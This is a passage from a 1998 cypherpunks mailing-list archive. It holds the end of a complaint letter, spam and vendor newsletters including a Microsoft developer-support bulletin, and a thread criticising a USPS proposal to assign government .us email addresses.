 I ask that you do you job and issue the warrants of arrest.  Or write me and tell me why you cannot. 
 
I ask that you respond within 30 days. 
 
No response is an invalid response.  As  accused felon former chief judge J Clifford Wallace may 
now know. 
 
Sincerely, 
 
 
 
William H. Payne 
13015 Calle de Sandias NE 
Albuquerque, NM 87111 
 
Distribution 
 
Antoin Scalia   http://www.jya.com/whpscalia.htm   Certified Return receipt requested 
http://www.senate.gov/committee/judiciary.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Mon, 10 Aug 1998 03:20:45 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: If women had willies.../Sergeant Major 'Just wants to be a woman' http://stuffed.net/98/8/10/
Message-ID: <19980810080001.19559.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/plain

Welcome to  today's  issue of Stuffed. To read it you should
click on the URL below.  If it is not made clickable by your
email program  you will need to  use your mouse to highlight
the line,  copy it and then paste it into your browser (then
press Return).

http://stuffed.net/98/8/10/

If you  have an email program that can display web pages you
will find today's front cover should have already been disp-
layed and can be clicked on to take you straight to Stuffed.

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rtr@internetmedia.com
Date: Mon, 10 Aug 1998 08:55:07 -0700 (PDT)
To: rtr@internetmedia.com
Subject: Earn $10,000+ for your non-profit organization!
Message-ID: <bulk.30131.19980810155406@stripper.xcitemail.com>
MIME-Version: 1.0
Content-Type: text/plain


RTR Telecom provides a "unique" and "risk-free" fund-raising opportunity
to non-profit organizations throughout America.

Could you use tens of thousand of dollars for a current or future project?

RTR Telecom provides a vehicle for even the smallest organizations to
raise thousands of dollars with no out-of-pocket investment or 
risk!

RTR Telecom provides pre-paid phonecards on a consignment basis for 
approved accounts. The organization receives the cards FREE and pays 
only after they are sold. 

RTR's easy fund raising program book will show you step-by-step how to
distribute these great new products. All cards are custom designed with
graphics and voice prompts of your choice.

For more information please visit:

http://www.webcast1.com/fundraising

Click here!

Call or email to request more information!

888-995-8811
_______________________________________________________________________
RTR Telecom respects your online time and Internet privacy! This is a 
one-time only solicitation. Your address will be deleted from our files. 
Thank you!
_______________________________________________________________________




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_001385@news.newswire.microsoft.com>
Date: Mon, 10 Aug 1998 12:36:07 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Developer Support News Watch - August 10, 1998
Message-ID: <199808101936.MAA28815@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Developer Support News Watch
============================
As a subscriber to Developer Support News Watch, you receive e-mail
twice each month that highlights some of the new articles recently
published on Support Online, Microsoft's award-winning technical support
web site.  

Table of Contents
=================
(1) Announcements
(2) New Knowledge Base Articles
(3) Requesting Articles via E-Mail
(4) Developer Product FAQs & Support Resources
(5) Additional Resources

(1) Announcements

New Features Make Finding Your Answers on Support Online Even Easier
--------------------------------------------------------------------
Support Online recently released a number of new features to make it 
even easier to find the answers you need. The following highlights some of 
the enhancements you'll see on Support Online at http://support.microsoft.com/.

For information about how to use these new Support Online features, see 
http://support.microsoft.com/support/howto/.

- Specify an article ID number. If you know the ID number of the 
  Knowledge Base article you want, you can enter the ID number 
  to find that specific article.

- Search for troubleshooting tools. Now you can customize your 
  search to include troubleshooting tools only.

- Search for specific drivers and other downloadable files. If you
  know the name of the driver or download file you want, enter the
  full file name to find the file on Support Online. 

- See what's new. If you want to see the latest information about 
  a product and/or a topic, use the What's New option and select 
  the number of days you want to review. You can select 1, 3, 7, 
  14, or 30 days.  

- Toggle between Advanced View and Basic View. Advanced View 
  offers additional search options and other features. Now you 
  can easily toggle between Advanced View and Basic View.

Need help using these features? See http://support.microsoft.com/support/howto/.

(2) New Knowledge Base Articles
===============================
In addition to the FAQ documents mentioned below, the 
following articles were recently added or updated in the 
Microsoft Knowledge Base:

Active Data Objects
-------------------
INFO: CreateRecordset Method Cannot Directly Post to Database (190903)
http://support.microsoft.com/support/kb/articles/q190/9/03.asp
SAMPLE: CreateRS.exe Uses the CreateRecordset Function in VC++ (190473)
http://support.microsoft.com/support/kb/articles/q190/4/73.asp

ActiveX SDK
-----------
INFO: Java Applets Cannot Be Scripted in Mac Internet Explorer (190283)
http://support.microsoft.com/support/kb/articles/q190/2/83.asp
INFO: Cannot Distribute Eastman or Wang Imaging Controls (190036)
http://support.microsoft.com/support/kb/articles/q190/0/36.asp

Active Server Pages
-------------------
PRB: ADODB.Recordset Error '800a0bb9' When Using Boolean Filter (190743)
http://support.microsoft.com/support/kb/articles/q190/7/43.asp
HOWTO: Insert Into SQL with Embedded Single Quotes from ASP (190742)
http://support.microsoft.com/support/kb/articles/q190/7/42.asp

Internet Explorer Development
-----------------------------
BUG: Using Scriptlet Control in MFC App causes assertion (190838)
http://support.microsoft.com/support/kb/articles/q190/8/38.asp
BUG: UNICODE Byte Order Marks Ignored by Internet Explorer 4.0x (190837)
http://support.microsoft.com/support/kb/articles/q190/8/37.asp
FIX: 16-Bit Internet Explorer Fails on Secure Sites Using Proxy (190662)
http://support.microsoft.com/support/kb/articles/q190/6/62.asp
PRB: HTML Tag KEYGEN Not Supported in Internet Explorer (190282)
http://support.microsoft.com/support/kb/articles/q190/2/82.asp
DOC: THEAD tag Fails to Create Static Headings in Scrolling Pane (190281)
http://support.microsoft.com/support/kb/articles/q190/2/81.asp
INFO: JavaScript Entities Not Supported in Internet Explorer 4.0 (190280)
http://support.microsoft.com/support/kb/articles/q190/2/80.asp
BUG: THEAD and TFOOTER Text Is Not Printed on Each Page (190278)
http://support.microsoft.com/support/kb/articles/q190/2/78.asp
PRB: HREF="#" with Event Code Behaves Differently (190244)
http://support.microsoft.com/support/kb/articles/q190/2/44.asp
PRB: Using Brackets [] to Index an Array of Objects Causes Error (190243)
http://support.microsoft.com/support/kb/articles/q190/2/43.asp
PRB: JavaScript Errors, Broken Images, and Links Over SSL (190052)
http://support.microsoft.com/support/kb/articles/q190/0/52.asp
BUG: HTML Dialog Ignores Size Parameters Without <SCRIPT> Block (190051)
http://support.microsoft.com/support/kb/articles/q190/0/51.asp
BETA-INFO: ActiveX Controls Removed from Internet Explorer 5.0 (190045)
http://support.microsoft.com/support/kb/articles/q190/0/45.asp
PRB: Backspace in ATL Subclassed CTL Causes IE to Navigate Back (190044)
http://support.microsoft.com/support/kb/articles/q190/0/44.asp

ISAPI Programming
-----------------
INFO: Using WinInet APIs in a System Service to access SSL sites (190542)
http://support.microsoft.com/support/kb/articles/q190/5/42.asp
FIX: Memory Leak in MIFST Crash Recovery If NEWFILEID Received (190483)
http://support.microsoft.com/support/kb/articles/q190/4/83.asp
FIX: UserKey Component Causes MIFST to Terminate (190482)
http://support.microsoft.com/support/kb/articles/q190/4/82.asp
FIX: MIFST Web Client Development Kit Component Problems (190481)
http://support.microsoft.com/support/kb/articles/q190/4/81.asp

Visual FoxPro
-------------
BUG: RUN Command Hangs Form with WindowType=1 and Desktop=.T. (190545)
http://support.microsoft.com/support/kb/articles/q190/5/45.asp
BUG: Compile of Report with #INCLUDE Causes VFP to Terminate (190544)
http://support.microsoft.com/support/kb/articles/q190/5/44.asp
BUG: SELECT-SQL with Subselects in WHERE Clause Stops VFP (190540)
http://support.microsoft.com/support/kb/articles/q190/5/40.asp
PRB: List Box Becomes Distorted Counting the Selected Items (190497)
http://support.microsoft.com/support/kb/articles/q190/4/97.asp
SAMPLE: Wd97vba.exe Contains Header File w/ Word VBA Constants (190259)
http://support.microsoft.com/support/kb/articles/q190/2/59.asp
BUG: Pressing ESC Twice in Combo Box Resets ListIndex Property (190258)
http://support.microsoft.com/support/kb/articles/q190/2/58.asp

Visual InterDev
---------------
BUG: Error Calling Some Methods from OnDatasetComplete (190768)
http://support.microsoft.com/support/kb/articles/q190/7/68.asp
BUG: File May Change When Saving to a Web Project (190767)
http://support.microsoft.com/support/kb/articles/q190/7/67.asp
BUG: Misinformation in "PageObject Script Object" Help Topic (190765)
http://support.microsoft.com/support/kb/articles/q190/7/65.asp
BUG: Intellisense May Indicate Optional Parameters are Required (190764)
http://support.microsoft.com/support/kb/articles/q190/7/64.asp
PRB: Default for Removing Orphaned Files May Cause Data Loss (190763)
http://support.microsoft.com/support/kb/articles/q190/7/63.asp
PRB: Cannot Access a Stored Procedure's Return Value from DTC (190762)
http://support.microsoft.com/support/kb/articles/q190/7/62.asp
PRB: User Name is Blank in Login Dialog Box From Remote Debug (190761)
http://support.microsoft.com/support/kb/articles/q190/7/61.asp
BUG: Dataview Stops After Typing In An Invalid Name (190760)
http://support.microsoft.com/support/kb/articles/q190/7/60.asp
BUG: No Warning That Move Last Will Not Work (190759)
http://support.microsoft.com/support/kb/articles/q190/7/59.asp
BUG: Recalculate Links Does Not Update File Version Number (190758)
http://support.microsoft.com/support/kb/articles/q190/7/58.asp
BUG: Remove Web Project From Source Control Is Allowed (190757)
http://support.microsoft.com/support/kb/articles/q190/7/57.asp
BUG: GPF When Setting a Breakpoint on a Stored Procedure (190756)
http://support.microsoft.com/support/kb/articles/q190/7/56.asp
BUG: IE Fails to Render When Adding Multiple Typelib References (190755)
http://support.microsoft.com/support/kb/articles/q190/7/55.asp
BUG: Incorrect Warning When Attempting to Add Data Connection (190754)
http://support.microsoft.com/support/kb/articles/q190/7/54.asp
BUG: Page Not Refreshed When Pointing to a Deleted Record (190753)
http://support.microsoft.com/support/kb/articles/q190/7/53.asp
BUG: Application Roots Are Not Reconfigured (190752)
http://support.microsoft.com/support/kb/articles/q190/7/52.asp
BUG: Form Manager Does Not Show Any Information (190751)
http://support.microsoft.com/support/kb/articles/q190/7/51.asp
BUG: Default.asp Renamed To Default.htm When Copying a Web (190750)
http://support.microsoft.com/support/kb/articles/q190/7/50.asp
BUG: Data Does Not Display When Previewing an RDS-Based Page (190749)
http://support.microsoft.com/support/kb/articles/q190/7/49.asp
BUG: Files Modified Outside of VI Do Not Get Copied to Server (190748)
http://support.microsoft.com/support/kb/articles/q190/7/48.asp
BUG: Remove Local Copy After Check-in Option Deletes Master (190747)
http://support.microsoft.com/support/kb/articles/q190/7/47.asp
BUG: Default Beep When Editing Read-Only Files (190746)
http://support.microsoft.com/support/kb/articles/q190/7/46.asp
BUG: PageObjectDTC May Publish Wrong Parameter Names (190681)
http://support.microsoft.com/support/kb/articles/q190/6/81.asp
BUG: Outline Windows Don't Show Items Made With Server- Side (190680)
http://support.microsoft.com/support/kb/articles/q190/6/80.asp
BUG: The Window_Onload Event Fails to Fire when Page Loads (190679)
http://support.microsoft.com/support/kb/articles/q190/6/79.asp
BUG: WalletAddress and WalletPayment Fail to Load (190678)
http://support.microsoft.com/support/kb/articles/q190/6/78.asp
PRB: Cannot Set Default Languages for All New Web Projects (190677)
http://support.microsoft.com/support/kb/articles/q190/6/77.asp
BUG: Parameter Info Tooltip Does Not Appear (190676)
http://support.microsoft.com/support/kb/articles/q190/6/76.asp
BUG: The Web Application Is Not Copied Successfully (190675)
http://support.microsoft.com/support/kb/articles/q190/6/75.asp
PRB: Grid DTC's Underlying Recordset Changes are Lost (190674)
http://support.microsoft.com/support/kb/articles/q190/6/74.asp
BUG: Recordset Commands Must Wait Until Ondatasetcomplete (190594)
http://support.microsoft.com/support/kb/articles/q190/5/94.asp
BUG: ORACLE Procedures with Lower Case Names Are Not Executed (190593)
http://support.microsoft.com/support/kb/articles/q190/5/93.asp
BUG: Recordset NavBarAlignment Displays Incorrect Property (190592)
http://support.microsoft.com/support/kb/articles/q190/5/92.asp
BUG: Inserting a New Record With addImmediate May Fail (190591)
http://support.microsoft.com/support/kb/articles/q190/5/91.asp
BUG: Grid DTC May Not Appear When Browsed (190590)
http://support.microsoft.com/support/kb/articles/q190/5/90.asp
BUG: ADO Error 800a0cc1 Using SetSQLText Or SetRecordSource (190589)
http://support.microsoft.com/support/kb/articles/q190/5/89.asp
BUG: Client-Side RecordsetDTC May Create Blank Line (190588)
http://support.microsoft.com/support/kb/articles/q190/5/88.asp
PRB: Misinformation in "setSQLText Method" Regarding Requery (190587)
http://support.microsoft.com/support/kb/articles/q190/5/87.asp
BUG: Script Outline May Not Show Elements Within a Form Element (190586)
http://support.microsoft.com/support/kb/articles/q190/5/86.asp
BUG: getRecordsetNavbar and getPagingNavbar Methods Do Not Work (190585)
http://support.microsoft.com/support/kb/articles/q190/5/85.asp
PRB: Records Displayed with Dataform Wizard Are Incorrect (190582)
http://support.microsoft.com/support/kb/articles/q190/5/82.asp
HOWTO: Delete a Web Project Created in Visual InterDev 1.0 (190581)
http://support.microsoft.com/support/kb/articles/q190/5/81.asp

Java Programming
----------------
FIX: Double-Byte Characters in Java Applets Print Incorrectly (190571)
http://support.microsoft.com/support/kb/articles/q190/5/71.asp
BUG: java.awt.event.KeyListener.keyTyped Method Does Not Work (190301)
http://support.microsoft.com/support/kb/articles/q190/3/01.asp
MAPI Programming
PRB: CDO: Session.Logon Fails with E_AccessDenied (0x80070005) (190548)
http://support.microsoft.com/support/kb/articles/q190/5/48.asp

Internet Scripting
------------------
PRB: "Is Not An Object" Error When Submitting Incomplete Doc (190279)
http://support.microsoft.com/support/kb/articles/q190/2/79.asp
INFO: VBScript Features Not in Visual Basic for Applications (190274)
http://support.microsoft.com/support/kb/articles/q190/2/74.asp
INFO: Visual Basic for Applications Features Not in VBScript (190273)
http://support.microsoft.com/support/kb/articles/q190/2/73.asp
PRB: Semantic Compatibility Problem with Hardtypes in VBScript (190272)
http://support.microsoft.com/support/kb/articles/q190/2/72.asp
PRB: No Error When Dimming a Variable That Already Has a Value (190271)
http://support.microsoft.com/support/kb/articles/q190/2/71.asp
HOWTO: Change the Function an Event Handler Points To (190247)
http://support.microsoft.com/support/kb/articles/q190/2/47.asp
PRB: FileSystemObject Object Causes Scripting Error (190245)
http://support.microsoft.com/support/kb/articles/q190/2/45.asp

Visual C++
----------
PRB: Failed to Verify Platform or OS Version (190801)
http://support.microsoft.com/support/kb/articles/q190/8/01.asp
BUG: VC Debugger Fails for WINCE App if Total DLLs Exceed Four (190800)
http://support.microsoft.com/support/kb/articles/q190/8/00.asp
PRB: Potential Errors Passing CRT Objects Across DLL Boundaries (190799)
http://support.microsoft.com/support/kb/articles/q190/7/99.asp
PRB: VC Installation Hangs With Message "Updating Registry" (190796)
http://support.microsoft.com/support/kb/articles/q190/7/96.asp
PRB: Cannot Load EM.dll on Win98 with WinCE Toolkit for VC5.0 (190352)
http://support.microsoft.com/support/kb/articles/q190/3/52.asp
HOWTO: Use Microsoft Word's CAPI Messaging Interface (CMI) (190057)
http://support.microsoft.com/support/kb/articles/q190/0/57.asp

Win32 SDK
---------
HOWTO: Spawn Console Processes with Redirected Standard Handles (190351)
http://support.microsoft.com/support/kb/articles/q190/3/51.asp


(3) Requesting articles via e-mail
==================================

You can also receive these articles (and others) in e-mail by sending 
a message to mshelp@microsoft.com. In the Subject line of your message, 
enter the Article-ID number (Qnnnnnn). For example to receive Q162721, 
your Subject line should resemble the following example:

   Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple 
Article-ID numbers separated by a comma. For example:

   Subject: Q178049, Q174914, Q174062

To receive an index of articles, enter "Index" (without quotation marks) 
in the Subject line. For example: 

   Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp, 
see http://support.microsoft.com/support/kb/articles/q183/1/21.asp.

Visit Support Online
--------------------

We also encourage you to visit Support Online at 
http://support.microsoft.com/support/ to see our complete selection of 
helpful articles designed to answer questions about using Microsoft products.

(4) Developer Product FAQs & Support Resources
==============================================
Here's some highlights and pointers to the latest information on 
Microsoft Developer Tools:

Visual Studio Service Pack Released: Visual Studio 97 Service Pack 3 
contains bug fixes for many tools, and is now available for developers 
who use any of the Visual Studio tools. See 
http://www.microsoft.com/vstudio/sp/ for the latest information.

Visual BASIC Frequently Asked Questions:
For pointers to the latest Visual BASIC FAQ's, see
http://support.microsoft.com/support/vbasic/faq/default.asp

Visual C++ 5.0 (Professional & Enterprise) 
Frequently Asked Questions - FAQ (Q167654), see
http://support.microsoft.com/support/kb/articles/Q167/6/54.asp

Visual FoxPro 5.0 Frequently Asked Questions (FAQ), see
http://support.microsoft.com/support/vfoxpro/content/faq
/vfoxpro/vfp50win/default.asp

Visual J++ Frequently Asked Questions - FAQ (Q169173), see
http://support.microsoft.com/support/kb/articles/Q169/1/73.asp

Visual InterDev Troubleshooting Guide:
Look through this guide to help you quickly troubleshoot and overcome
the most common technical issues you may encounter when first setting up
your Microsoft Visual InterDev working environment.
See http://support.microsoft.com/support/vinterdev/content/tsguide.asp

Microsoft SourceSafe Frequently Asked Questions (FAQ) (Q134369), see
http://support.microsoft.com/support/kb/articles/Q134/3/69.asp

Microsoft Developer Support Messaging Frequently Asked Questions (FAQ)
http://support.microsoft.com/support/messagingsdk/faq/default.asp

Multimedia Sample Projects:
Add multimedia functionality to your Visual Basic program by using the
techniques in these Visual Basic sample projects. See
http://support.microsoft.com/support/vbasic/vbmm.asp

Active Template Library (ATL) Frequently Asked Questions (Q166480), see
http://support.microsoft.com/support/kb/articles/Q166/4/80.asp

Popular MFC Samples--created by support engineers for MFC developers.
See http://support.microsoft.com/support/visualc/atlmfc/samples.asp

OLE Automation Using MFC
For the latest articles about automating Microsoft Office 97 components
using the Microsoft Foundation Classes (MFC), see
http://support.microsoft.com/support/visualc/atlmfc/oleatmfc.asp

VBA Software Development Kit Frequently Asked Questions - FAQ (Q170298) 
http://support.microsoft.com/support/kb/articles/Q170/2/98.asp

COM Security Frequently Asked Questions - FAQ (Q158508), see 
http://support.microsoft.com/support/kb/articles/Q158/5/08.asp

ADC 1.0 FAQ Available for Download (Q165292), see
http://support.microsoft.com/support/kb/articles/Q165/2/92.asp
Or download directly from:
http://support.microsoft.com/download/support/mslfiles/ADC10FAQ.EXE

Visual Modeler 1.0 Frequently Asked Questions (FAQ)(Q166395), see
http://support.microsoft.com/support/kb/articles/Q166/3/95.asp

ActiveX Data Objects (ADO) Frequently Asked Questions (Q183606) 
http://support.microsoft.com/support/kb/articles/Q183/6/06.asp 

Microsoft Internet Finance Server Toolkit (MIFST) Frequently Asked 
Questions (Q182448) 
http://support.microsoft.com/support/kb/articles/Q182/4/48.asp 

Developing with the ActiveX SDK - FAQ (Q158264), see 
http://support.microsoft.com/support/kb/articles/Q158/2/64.asp 

Developing with the Internet Client SDK - FAQ (Q167435), see 
http://support.microsoft.com/support/kb/articles/Q167/4/35.asp

SDK for Java Frequently Asked Questions - FAQ (Q168942), see
http://support.microsoft.com/support/kb/articles/Q168/9/42.asp

Microsoft SDK for Java Release:
Go to this page to download the latest released Microsoft SDK for 
Java, which contains the current Java VM for IE, support 
for JDK 1.1, J/Direct, AFC, samples, the latest Java compiler, 
and documentation.  See http://www.microsoft.com/java/download.htm

The latest Microsoft VM for Java: Easily upgrade to the latest VM, 
See http://www.microsoft.com/java/vm/dl_vmsp2.htm

Java/COM/DCOM Frequently Asked Questions - FAQ (Q168935), see
http://support.microsoft.com/support/kb/articles/Q168/9/35.asp

CAB Files Frequently Asked Questions - FAQ (Q168941), see
http://support.microsoft.com/support/kb/articles/Q168/9/41.asp

AFC Frequently Asked Questions - FAQ (Q168943) 
http://support.microsoft.com/support/kb/articles/Q168/9/43.asp


(5) Additional Resources
========================
In addition, the following resources might prove helpful:

Check out the MSDN "Buzz" for the latest information on Microsoft's
developer tools and strategies: http://www.microsoft.com/msdn/

For the latest and greatest information about Internet technologies,
the Microsoft SiteBuilder Network can be found at:
http://www.microsoft.com/workshop/default.asp

For links to specific developer tools products and technologies, refer to:
Products:  http://www.microsoft.com/msdn/products/
Technologies:  http://www.microsoft.com/msdn/techsite/

TechNet has a new site, ITHome, which offers comprehensive resources for
corporate developers: http://www.microsoft.com/ithome/


Sincerely,
The Microsoft Developer Support team

========================
Microsoft-sponsored events:

For information on all Microsoft-sponsored events, please visit:
http://events.microsoft.com

========================
How to use this mailing list:

You received this e-mail newsletter as a result of your registration on the Microsoft.com Personal Information Center. You may unsubscribe from this e-mail newsletter, or subscribe to a variety of other informative e-mail newsletters, by returning to the Personal Information Center at
http://register.microsoft.com/regwiz/personalinfo.asp
and changing your subscription preferences.

Alternatively, please send a reply to this e-mail with the word "unsubscribe" as the first line in the body of the message.

========================
THIS DOCUMENT IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY.  The information contained in this document represents the current view of Microsoft Corporation on the issues discussed as of the date of publication.  Because Microsoft must respond to change in market conditions, it should not be interpreted to be a commitment on the part of Microsoft and Microsoft cannot guarantee the accuracy of any information presented after the date of publication.
INFORMATION PROVIDED IN THIS DOCUMENT IS PROVIDED 'AS IS' WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE IMPLIED WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND FREEDOM FROM INFRINGEMENT.
The user assumes the entire risk as to the accuracy and the use of this document. This  document may be copied and distributed subject to the following conditions:
1.   All text must be copied without modification and all pages must be included
2.   All copies must contain Microsoft's copyright notice and any other notices provided therein
3.   This document may not be distributed for profit




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 10 Aug 1998 11:22:07 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 10, 1998
Message-ID: <199808101816.NAA16263@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain

Warning
Could not process message with given Content-Type: 
multipart/mixed; boundary="---- =_NextPart_000_01BDC467.BAA716B0"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Date: Mon, 10 Aug 1998 12:06:16 -0700 (PDT)
To: CTIA Daily News <CTIA_Daily_News@um2.unitymail.com>
Subject: CTIA Daily News from WOW-COM - August 10, 1998
Message-ID: <199808101854.NAA19734@mailstrom.revnet.com>
MIME-Version: 1.0
Content-Type: text/plain




==========================================
Welcome to today's edition of the CTIA Daily News
from WOW-COM.  Please click on the icon / attachment
for the most important news in wireless communications today.

If you cannot open the icon/attachment, please visit
http://www.wow-com.com/professional/  for the wireless 
daily news.

Don't miss the major conference on implementing 
Phase 2 of the E-911 requirement--August 26-27 
in San Francisco.  For more information, click 
http://www.wow-com.com/pdf/locntech.pdf 
===========================================
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Mon, 10 Aug 1998 12:44:53 -0700 (PDT)
To: "Trei, Peter" <ptrei@securitydynamics.com>
Subject: Re: I'm from the government, and I'm here to control your email....
In-Reply-To: <D104150098E6D111B7830000F8D90AE8017958@exna02.securitydynamics.com>
Message-ID: <199808101944.PAA17053@domains.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain


In <D104150098E6D111B7830000F8D90AE8017958@exna02.securitydynamics.com>,
on 08/10/98 
   at 02:56 PM, "Trei, Peter" <ptrei@securitydynamics.com> said:

>There is an utter cluelessness here which assumes that there is and/or
>should be a strong corrospondence between an individual,  a physical
>location, and an email address. This is not suprising,  considering that
>this is from the Post Office, which is mired a 19th century concept of
>what constitutes 'mail'.

>I suspect that the PO will want to be able to charge for 
>all mail sent to these addresses. The miserable failure 
>of the USPS to generate any interest in their offer to 'frank' email (for
>a price) may play into this.

>Once everyone has an government registered email address, it will be a
>simple matter to forbid the use of uncontrolled email addresses (for
>either sending or receiving) at least within the  US. It's to be expected
>that government agencies will refuse to send to any other address.

>In my opinion, the proper response of the USPS to competition from email
>and parcel delivery services would be to wind down USPS  operations.
>There is no longer a critical need for a protected  monopoly in postal
>delivery.

Well this is the last thing the USPS wants to do (power corrupts and all
that) and they have a few congress critters on their side. 

A while back they had the postmaster general on C-Span giving his yearly
report to congress. USPS is scared to death of the internet and have been
scrambling around trying to find a way to generate revenue from it. Back
then they were talking about establishing USPS as a national CA and a
center for certified e-mail. I guess they realized that there is no way
they can compete in the marketplace and the only thing to do is to force
their system on everyone.

Now enter the usual suspects and their agenda:

Mandate USPS e-mail addresses for everyone.
Mandate National Electronic ID's (security measure for USPS e-mail).
Mandate use of National CA for ID's (run by USPS).
Mandate GAK for all e-mail on the USPS system.
Mandate all communication to & from government use USPS system.

*Big* tax increase to pay for it all with plenty of pork to go round. Hell
in a few years you will have them whining and crying that computer
ownership is a "right" and we need to *pay* for all those welfare bums to
have one (how else will they get their mail?). At a very minimum every
post office will be set up with public computer terminals so people can
get their mail.

Many of the unusual suspects that will go along with this plan will be
from the states like Alaska, Idaho, North Dakota, ...ect who are fearful
that their constituents will actually have to pay a fair price to have
mail and packages delivered to bum-fuck nowhere. I don't recall the name
but one of the critter from Alaska was very upset that if USPS looses it's
monopoly delivery in Alaska would no longer be subsidized and that they
might have to pay market value to have packages delivered by plane to the
far reaches of the wilderness (god forbid!!).

-- 
---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
---------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: James Glave <james@wired.com>
Date: Mon, 10 Aug 1998 14:40:33 -0700 (PDT)
To: "Trei, Peter" <ptrei@securitydynamics.com>
Subject: Re: I'm from the government, and I'm here to control your email....
In-Reply-To: <D104150098E6D111B7830000F8D90AE8017958@exna02.securitydynamics.com>
Message-ID: <199808102140.OAA23948@hardly.hotwired.com>
MIME-Version: 1.0
Content-Type: text/plain


See Also:


http://www.wired.com/news/news/politics/story/13129.html

Postal Service Eyes .us Domain

12:30 pm PDT 19 Jun 98 The post office is circulating a draft laying out
its case for taking over the United States' official top-level Internet
domain as a means of accelerating ecommerce.

The 8 May proposal outlines four goals the postal service would pursue if
granted authority over the domain by Jon Postel, who heads up the numbers
authority and administers the .us domain. The service said it is already
working with Postel's group to map .us domain space against its postal
address database. 

Postal service spokeswoman Sue Brennan said the proposal was developed at
the urging of the White House. 

"The administration requested that we investigate the policy of a .us
domain, just to investigate what would be involved," Brennan said. "The
majority of the other countries have their own country domain ... managed
by the government, so the Commerce Department was investigating the
possibilities [of doing the same in the United States]." 

According to the proposal submitted to the institute, the postal service
would "engage the private sector in the development of credentialed,
commerce-enabling space under .us [and] promote classified business
addressing under .us at local, state, and national levels as an open
reference for public and private delivery systems and competing directory
services." 

The proposal also said the postal service would "manage an open policy
process to develop policies for expanding the .us domain... [and] work
toward the establishment of a governance structure that will represent the
diversity of stakeholder interests -- private, nonprofit, and public -- in
a fully developed .us domain space 

	[snipped...]


James Glave, News Editor, Wired News, http://www.wired.com  (415) 276-8430




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Trei, Peter" <ptrei@securitydynamics.com>
Date: Mon, 10 Aug 1998 11:55:27 -0700 (PDT)
To: "'cypherpunks@toad.com>
Subject: I'm from the government, and I'm here to control your email....
Message-ID: <D104150098E6D111B7830000F8D90AE8017958@exna02.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


- start of quoted section -----------

http://www.computerworld.com/home/news.nsf/all/9808064usps

Clinton backs universal E-mail plan
By Tom Diederich

The Clinton administration wants all Americans to have an E-mail
address to go along with their street address and is asking the
U.S. Postal Service to deliver the project's backbone. 

The idea is to connect physical and electronic addresses using the
nation's Internet "country code" -- the top-level ".us" domain. Then
a company or government agency, for example, could send bills or
bulletins to your electronic mailbox as well as your home. 

The administration said the move would "accelerate and
universalize the growth of electronic commerce," according to the
Postal Service. 

[...]

The Postal Service sent a proposal to launch the .us domain
initiative to the Commerce Department on June 1. The department
on Monday said it would accept comments from the public, based
on 11 questions 
(http://www.ntia.doc.gov/ntiahome/domainname/usrfc/dotusrfc.htm, 
until Sept. 3. )

Responses will be posted on the National Telecommunications and
Information Administration's Web site (http://www.ntia.doc.gov/).

- end of quoted section -

There is an utter cluelessness here which assumes that there
is and/or should be a strong corrospondence between an individual, 
a physical location, and an email address. This is not suprising, 
considering that this is from the Post Office, which is mired
a 19th century concept of what constitutes 'mail'.

I suspect that the PO will want to be able to charge for 
all mail sent to these addresses. The miserable failure 
of the USPS to generate any interest in their offer to 'frank'
email (for a price) may play into this.

Once everyone has an government registered email address, it
will be a simple matter to forbid the use of uncontrolled email
addresses (for either sending or receiving) at least within the 
US. It's to be expected that government agencies will refuse to
send to any other address.

In my opinion, the proper response of the USPS to competition from
email and parcel delivery services would be to wind down USPS 
operations. There is no longer a critical need for a protected 
monopoly in postal delivery.

Peter Trei

Disclaimer: The above represents my personal opinions only.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Mon, 10 Aug 1998 13:20:14 -0700 (PDT)
To: "Trei, Peter" <ptrei@securitydynamics.com>
Subject: Re: I'm from the government, and I'm here to control your email....
In-Reply-To: <D104150098E6D111B7830000F8D90AE8017958@exna02.securitydynamics.com>
Message-ID: <Pine.SUN.3.91.980810150113.12985A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 10 Aug 1998, Trei, Peter wrote:

> Once everyone has an government registered email address, it
> will be a simple matter to forbid the use of uncontrolled email
> addresses (for either sending or receiving) at least within the 
> US. It's to be expected that government agencies will refuse to
> send to any other address.

	I don't know how easy this would be.  The Govt would be going
	up against some pretty heavy businesses if they wanted to 
	eliminate all but their own email addresses.  I can see them
